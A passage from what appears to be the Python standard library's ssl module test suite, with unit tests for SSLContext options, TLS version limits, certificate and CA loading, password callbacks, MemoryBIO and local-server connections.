ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
@skip_if_broken_ubuntu_ssl
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
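        # The attribute is writable only when the underlying OpenSSL supports
        # disabling common-name checks (ssl.HAS_NEVER_CHECK_COMMON_NAME);
        # otherwise assigning to it raises AttributeError.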
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
        # any combination of flags is accepted
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
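        # Exercise load_cert_chain() with combined and separate key/cert
        # files, mismatching pairs, and password-protected keys, using
        # str/bytes/bytearray passwords as well as password callbacks.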
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
            # OpenSSL has a fixed limit on the password buffer:
            # PEM_BUFSIZE is generally set to 1 KiB.  Pass a password
            # larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
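        # load_cert_chain() configures the context's own certificate and must
        # not touch the verification store; only load_verify_locations()
        # increases the x509/x509_ca counters.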
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
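        # Enabling check_hostname on a CERT_NONE context automatically raises
        # verify_mode to CERT_REQUIRED, and verify_mode cannot be set back to
        # CERT_NONE while check_hostname is enabled.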
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        # Auto set CERT_REQUIRED again
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
class MemoryBIOTests(unittest.TestCase):
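    """Tests for the ssl.MemoryBIO buffer object used with wrap_bio()."""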
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
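        # SSLObject has no public constructor; instances must be created via
        # SSLContext.wrap_bio().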
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
